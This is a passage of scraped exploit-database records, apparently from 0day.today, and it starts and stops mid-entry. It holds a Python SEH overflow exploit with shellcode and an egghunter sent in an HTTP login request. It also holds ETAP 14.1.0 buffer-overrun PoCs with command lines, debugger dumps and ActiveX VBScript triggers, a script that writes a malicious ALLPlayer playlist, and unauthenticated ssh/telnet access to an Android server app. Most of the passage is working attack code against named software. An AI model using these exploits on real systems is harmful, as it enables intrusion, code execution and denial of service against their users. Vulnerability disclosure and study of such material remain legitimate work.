\"\\x56\\xb1\\xf1\\xb0\\x1d\\x9d\\x15\\x46\\xf1\\x95\\x21\\xc3\\xf4\"\r\nbuf += \"\\x79\\xa0\\x97\\xd2\\x5d\\xe9\\x4c\\x7a\\xc7\\x57\\x22\\x83\\x17\"\r\nbuf += \"\\x38\\x9b\\x21\\x53\\xd4\\xc8\\x5b\\x3e\\xb0\\x3d\\x56\\xc1\\x40\"\r\nbuf += \"\\x2a\\xe1\\xb2\\x72\\xf5\\x59\\x5d\\x3e\\x7e\\x44\\x9a\\x41\\x55\"\r\nbuf += \"\\x30\\x34\\xbc\\x56\\x41\\x1c\\x7a\\x02\\x11\\x36\\xab\\x2b\\xfa\"\r\nbuf += \"\\xc6\\x54\\xfe\\x97\\xc3\\xc2\\xc1\\xc0\\xb7\\x92\\xaa\\x12\\x48\"\r\nbuf += \"\\x83\\x76\\x9a\\xae\\xf3\\xd6\\xcc\\x7e\\xb3\\x86\\xac\\x2e\\x5b\"\r\nbuf += \"\\xcd\\x22\\x10\\x7b\\xee\\xe8\\x39\\x11\\x01\\x45\\x11\\x8d\\xb8\"\r\nbuf += \"\\xcc\\xe9\\x2c\\x44\\xdb\\x97\\x6e\\xce\\xe8\\x68\\x20\\x27\\x84\"\r\nbuf += \"\\x7a\\xd4\\xc7\\xd3\\x21\\x72\\xd7\\xc9\\x4c\\x7a\\x4d\\xf6\\xc6\"\r\nbuf += \"\\x2d\\xf9\\xf4\\x3f\\x19\\xa6\\x07\\x6a\\x12\\x6f\\x92\\xd5\\x4c\"\r\nbuf += \"\\x90\\x72\\xd6\\x8c\\xc6\\x18\\xd6\\xe4\\xbe\\x78\\x85\\x11\\xc1\"\r\nbuf += \"\\x54\\xb9\\x8a\\x54\\x57\\xe8\\x7f\\xfe\\x3f\\x16\\xa6\\xc8\\x9f\"\r\nbuf += \"\\xe9\\x8d\\xc8\\xdc\\x3f\\xeb\\xbe\\x0c\\xfc\"\r\n \r\n#pop pop ret 1006cd33\r\n \r\nnseh = \"\\x90\\x90\\xEB\\x0B\"\r\nseh = \"\\x33\\xcd\\x06\\x10\"\r\n \r\negghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\negghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n \r\n \r\nevil = \"POST /login HTTP/1.1\\r\\n\"\r\nevil += \"Host: 192.168.123.132\\r\\n\"\r\nevil += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nevil += \"Connection: close\\r\\n\"\r\nevil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\r\nevil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"\r\nevil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\r\nevil += \"Keep-Alive: 300\\r\\n\"\r\nevil += \"Proxy-Connection: keep-alive\\r\\n\"\r\nevil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\nevil += \"Content-Length: 17000\\r\\n\\r\\n\"\r\nevil += \"username=admin\"\r\nevil += \"&password=aaaaa\\r\\n\"\r\nevil += \"\\x41\" * 12292 #subtract/add for payload\r\nevil += \"w00tw00t\"\r\nevil += \"\\x90\" * 20\r\nevil += buf\r\nevil += \"\\x90\" * 50\r\nevil += \"\\x42\" * 1614\r\nevil += nseh\r\nevil += seh\r\nevil += \"\\x90\" * 20\r\nevil += egghunter\r\nevil += \"\\x90\" * 7000\r\n \r\nprint 'Sending evil buffer...'\r\ns.send(evil)\r\nprint 'Payload Sent!'\r\ns.close()\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25351"}, {"lastseen": "2018-04-10T09:47:04", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-05-23T00:00:00", "published": "2016-05-23T00:00:00", "href": "https://0day.today/exploit/description/26024", "id": "1337DAY-ID-26024", "type": "zdt", "title": "Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities", "sourceData": "Operation Technology ETAP 14.1.0 Multiple Stack Buffer Overrun Vulnerabilities\r\n \r\n \r\nVendor: Operation Technology, Inc.\r\nProduct web page: http://www.etap.com\r\nAffected version: 14.1.0.0\r\n \r\nSummary: Enterprise Software Solution for Electrical Power Systems. ETAP\r\nis the most comprehensive electrical engineering software platform for the\r\ndesign, simulation, operation, and automation of generation, transmission,\r\ndistribution, and industrial systems. As a fully integrated model-driven\r\nenterprise solution, ETAP extends from modeling to operation to offer a\r\nReal-Time Power Management System.\r\n \r\nDesc: Multiple ETAP binaries are prone to a stack-based buffer overflow\r\nvulnerability because the application fails to handle malformed arguments.\r\nAn attacker can exploit these issues to execute arbitrary code within the\r\ncontext of the application or to trigger a denial-of-service conditions.\r\n \r\nTested on: Microsfot Windows 7 Professional SP1 (EN) x86_64\r\n Microsoft Windows 7 Ultimate SP1 (EN) x86_64\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2016-5324\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5324.php\r\n \r\n \r\n07.04.2016\r\n \r\n--\r\n \r\n \r\n \r\nConfirmed vulnerable binaries:\r\n------------------------------\r\n \r\nacsdvd.exe\r\nca.exe\r\ncsdvd.exe\r\nDBExtractConsoleApp.exe\r\ndccalc.exe\r\netarcgis.exe\r\netarcgis92.exe\r\netarcgis93.exe\r\nETArcGIS_TD.exe\r\nETArcGIS_TD10.exe\r\netcabp.exe\r\netcp.exe\r\netgrd.exe\r\nETPanelRep.exe\r\nET_CATIA.exe\r\net_ieee.exe\r\nharmonic.exe\r\nLA3PH.exe\r\nLF3PH.exe\r\nlffd.exe\r\nlfgs.exe\r\nlfle.exe\r\nlfnr.exe\r\nms.exe\r\nOCP.exe\r\nopf.exe\r\nOtiMongoConvert.exe\r\nPlotCompare64.exe\r\nra.exe\r\nSC3Ph.exe\r\nscansi1p.exe\r\nscansi3p.exe\r\nSCGost1p.exe\r\nsciec1p.exe\r\nsciec3p.exe\r\nsciectr.exe\r\nscsource.exe\r\nSFA.exe\r\nso3ph.exe\r\nstlf.exe\r\nsvc.exe\r\nTDULF.exe\r\nts.exe\r\nuc.exe\r\n \r\n \r\n \r\nPoCs:\r\n-----\r\n[vuln binary] [>256 bytes as arg]\r\n===================================\r\n \r\n \r\nC:\\ETAP 1410>etcp.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(281c.202c): Access violation - code c0000005 (!!! second chance !!!)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\SysWOW64\\ntdll.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\etcp.exe\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\ETAP 1410\\etcp.exe\r\neax=00000041 ebx=00190002 ecx=0000000a edx=00000365 esi=00882966 edi=000003eb\r\neip=00407f38 esp=0018f660 ebp=0018f778 iopl=0 nv up ei pl nz na pe cy\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207\r\netcp+0x7f38:\r\n00407f38 668943fe mov word ptr [ebx-2],ax ds:002b:00190000=6341\r\n0:000> !exchain\r\n0018ff3c: etcp+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n \r\n===================================\r\n \r\n \r\nC:\\ETAP 1410>PlotCompare64.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nUnhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.\r\n at System.String.wcslen(Char* ptr)\r\n at System.String.CtorCharPtr(Char* ptr)\r\n at wmain(Int32 argc, Char** argv, Char** envp)\r\n at wmainCRTStartup()\r\n \r\n \r\n(3a98.1e20): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** WARNING: Unable to verify checksum for C:\\windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\54c5d3ee1f311718f3a2feb337c5fa29\\mscorlib.ni.dll\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\54c5d3ee1f311718f3a2feb337c5fa29\\mscorlib.ni.dll\r\nmscorlib_ni+0x48f380:\r\n000007fe`dd6df380 0fb701 movzx eax,word ptr [rcx] ds:0045005c`003a0043=????\r\n0:000> d rdi\r\n00000000`0278f558 00 65 93 dd fe 07 00 00-06 02 00 00 41 00 41 00 .e..........A.A.\r\n00000000`0278f568 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f578 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f588 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f598 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0278f5c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>ra.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(1e5c.2f90): Access violation - code c0000005 (!!! second chance !!!)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\SysWOW64\\ntdll.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\ra.exe\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\ETAP 1410\\ra.exe - \r\neax=0018f4a0 ebx=00000000 ecx=00000041 edx=00000359 esi=005c2962 edi=00000000\r\neip=00408376 esp=0018f2cc ebp=0018f3f4 iopl=0 nv up ei pl nz ac pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\r\nra!CFileMap::operator=+0x786:\r\n00408376 66898c50ae040000 mov word ptr [eax+edx*2+4AEh],cx ds:002b:00190000=6341\r\n0:000> !exchain\r\n0018ff3c: ra!CFileMap::GetLength+7b21 (00410041)\r\nInvalid exception stack at 00410041\r\n0:000> kb\r\nChildEBP RetAddr Args to Child \r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n0018f3f4 0040855f 00000001 0018f430 00000000 ra!CFileMap::operator=+0x786\r\n0018f410 00427462 f6504047 00000000 00000001 ra!CFileMap::GetLength+0x3f\r\n0018ff48 00410041 00410041 00410041 00410041 ra!CFileMap::SetFileLength+0x125a2\r\n0018ff4c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff50 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff54 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff58 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff5c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff60 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff64 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff68 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff6c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff70 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff74 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff78 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff7c 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff80 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n0018ff84 00410041 00410041 00410041 00410041 ra!CFileMap::GetLength+0x7b21\r\n..\r\n0:000> d esi\r\n005c2962 72 00 61 00 2e 00 65 00-78 00 65 00 20 00 20 00 r.a...e.x.e. . .\r\n005c2972 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c2982 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c2992 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29a2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29b2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29c2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n005c29d2 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>SFA.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(39e0.35b4): WOW64 breakpoint - code 4000001f (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\syswow64\\kernel32.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for SFA.exe - \r\nkernel32!GetProfileStringW+0x12cc9:\r\n75150265 cc int 3\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>so3ph.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(380c.3cc4): Break instruction exception - code 80000003 (first chance)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \r\n*** WARNING: Unable to verify checksum for SO3Ph.exe\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for SO3Ph.exe - \r\nkernel32!UnhandledExceptionFilter+0x71:\r\n00000000`76fcb8c1 cc int 3\r\n0:000> r\r\nrax=0000000000000000 rbx=0000000000000000 rcx=000063dde1df0000\r\nrdx=000000000000fffd rsi=0000000000000001 rdi=0000000000000002\r\nrip=0000000076fcb8c1 rsp=00000000000fe780 rbp=ffffffffffffffff\r\n r8=0000000000000000 r9=0000000000000000 r10=0000000000000000\r\nr11=00000000000fe310 r12=0000000140086150 r13=0000000000000000\r\nr14=000000000012eb00 r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206\r\nkernel32!UnhandledExceptionFilter+0x71:\r\n00000000`76fcb8c1 cc int 3\r\n \r\n \r\n===============================\r\n \r\n \r\nC:\\ETAP 1410>TDULF.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \r\n(36bc.36b8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\system32\\kernel32.dll - \r\n*** WARNING: Unable to verify checksum for C:\\ETAP 1410\\LF3PHDLL.dll\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\ETAP 1410\\LF3PHDLL.dll - \r\nkernel32!lstrcpyW+0xa:\r\n00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341\r\n0:000> r\r\nrax=000000000012e9d0 rbx=0000000000000001 rcx=0000000000130000\r\nrdx=0000000000000041 rsi=0000000000000000 rdi=000000000012bcf0\r\nrip=0000000076f7e41a rsp=000000000012bc98 rbp=0000000000000000\r\n r8=000000000012fc18 r9=0000000000000000 r10=0000000000000000\r\nr11=0000000000000202 r12=0000000000000000 r13=0000000000000000\r\nr14=000000000000000a r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\nkernel32!lstrcpyW+0xa:\r\n00000000`76f7e41a 668911 mov word ptr [rcx],dx ds:00000000`00130000=6341\r\n0:000> d rax\r\n00000000`0012e9d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012e9e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012e9f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n00000000`0012ea40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.\r\n...\r\n0:000> r\r\nrax=0000000000000000 rbx=0000000000000001 rcx=ffffffffffffffff\r\nrdx=00410041004123a1 rsi=0000000000000000 rdi=00410041004123a1\r\nrip=000007fefd0a17c7 rsp=000000000012b9a8 rbp=0000000000000000\r\n r8=ffffffffffffffff r9=000000000012ef68 r10=0000000000000000\r\nr11=0000000000000202 r12=0000000000000000 r13=0000000000000000\r\nr14=000000000000000a r15=0000000000000000\r\niopl=0 nv up ei ng nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286\r\nKERNELBASE!lstrlenW+0x17:\r\n000007fe`fd0a17c7 66f2af repne scas word ptr [rdi]\r\n \r\n \r\n===============================\r\n \r\n \r\nCOM/ActiveX PoCs:\r\n-----------------\r\n \r\n \r\n<html>\r\n<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />\r\n<script language='vbscript'>\r\ntargetFile = \"C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx\"\r\nprototype = \"Property Let Name As String\"\r\nmemberName = \"Name\"\r\nprogid = \"iPlotLibrary.iPlotDataCursorX\"\r\nargCount = 1\r\narg1=String(1000, \"A\")\r\ntarget.Name = arg1\r\n</script>\r\n</html>\r\n \r\n(2750.243c): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\windows\\syswow64\\OLEAUT32.dll - \r\neax=00000000 ebx=00000000 ecx=00000000 edx=02d13084 esi=02d13084 edi=001be684\r\neip=0301c146 esp=001be608 ebp=001be634 iopl=0 nv up ei pl nz ac pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216\r\niPlotLibrary!DllUnregisterServer+0x104e5a:\r\n0301c146 8b4304 mov eax,dword ptr [ebx+4] ds:002b:00000004=????????\r\n0:000> d edx\r\n02d13084 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d13094 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130a4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130b4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130c4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130d4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130e4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n02d130f4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA\r\n \r\n \r\n===============================\r\n \r\n \r\n<html>\r\n<object classid='clsid:E19FDFB8-B4F6-4065-BCCF-D37F3E7E4224' id='target' />\r\n<script language='vbscript'>\r\ntargetFile = \"C:\\Program Files (x86)\\Common Files\\ETAP\\iPlotLibrary.ocx\"\r\nprototype = \"Property Let MenuItemCaptionValueY As String\"\r\nmemberName = \"MenuItemCaptionValueY\"\r\nprogid = \"iPlotLibrary.iPlotDataCursorX\"\r\nargCount = 1\r\narg1=String(1044, \"A\")\r\ntarget.MenuItemCaptionValueY = arg1\r\n</script>\r\n</html>\n\n# 0day.today [2018-04-10] #", "sourceHref": "https://0day.today/exploit/26024", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-19T03:08:47", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2013-10-09T00:00:00", "published": "2013-10-09T00:00:00", "id": "1337DAY-ID-21357", "href": "https://0day.today/exploit/description/21357", "type": "zdt", "title": "ALLPlayer Local Buffer Overflow PoC UNICODE", "sourceData": "Title: ALLPlayer Local Buffer Overflow PoC UNICODE \r\nVendor: http://www.allplayer.org/download/allplayer\r\nDate found: 09.10.2013\r\nDate published: 09.10.2013\r\nPlatform: windows 7 German\r\nBug: Buffer Overflow UNICODE\r\n----------------------------\r\n \r\n1)VERSIONS AFFECTED\r\n----\r\nALLPlayer 5.6.2\r\n\r\n2)Proof of Concept\r\n------------------\r\n \r\njunk = \"http://\"\r\n\r\nbuffer=\"\\x41\" * 5000\r\n\r\nexploit = junk + buffer \r\n\r\ntry:\r\n out_file = open(\"ALLPlayer_Poc.m3u\",'w')\r\n out_file.write(exploit)\r\n out_file.close()\r\n print \"Exploit file created!\" \r\nexcept:\r\n print \"Error\"\r\n\r\n3)-(DEBUG)\r\n----------\r\n(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)\r\n*** WARNING: Unable to verify checksum for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\Program Files\\ALLPlayer\\ALLPlayer.exe\r\neax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000\r\neip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246\r\nALLPlayer+0x10041:\r\n00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??\r\n0:000> !exchain\r\n---------------\r\n0012e4b0: ALLPlayer+1b7037 (005b7037)\r\n0012e734: ALLPlayer+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\n4)Credits\r\n---------\r\nmetacom\r\nContact : metacom27 at gmail.com\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21357"}, {"lastseen": "2018-03-19T05:16:49", "bulletinFamily": "exploit", "description": "Ice Cold Apps Servers Ultimate version 6.0.2(12) for Android has no credentials by default and authentication is disabled for telnet/ssh/ftp, allowing remote access to the device's storage.", "modified": "2013-10-04T00:00:00", "published": "2013-10-04T00:00:00", "id": "1337DAY-ID-21336", "href": "https://0day.today/exploit/description/21336", "type": "zdt", "title": "Ice Cold Apps Servers Ultimate 6.0.2(12) Remote Command Execution", "sourceData": "Multiple vulnerabilities in Ice Cold Apps Servers Ulitmate Version 6.0.2(12) for Android\r\n\r\n9/8/13\r\nLarry W. Cashdollar, @_larry0\r\n\r\nhttp://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647\r\n\r\nhttp://www.icecoldapps.com\r\n\r\nVulnerabilities\r\n\r\nThere are no credentials by default, authentication is disabled for telnet/ssh/ftp allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.\r\n\r\n \u2022 ftp server allows writes to lighttp/php* directory.\r\n \u2022 telnet default authentication turned off.\r\n \u2022 ssh server default authentication turned off.\r\n \u2022 Anonymous SOCKS proxy & http/ftp proxy.\r\nSSHD\r\n\r\nlarry$ ssh 192.168.0.29 -p 2222\r\n$ id\r\nuid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $ uptime\r\nup time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00 $\r\n\r\nTelnet\r\n\r\nlarry$ telnet 192.168.0.29 2323\r\nTrying 192.168.0.29...\r\nConnected to 192.168.0.29.\r\nEscape character is '^]'.\r\n\r\nWelcome to tel!\r\nPlease enter some text to test the connection and hit enter:\r\n\r\n$\r\n$ 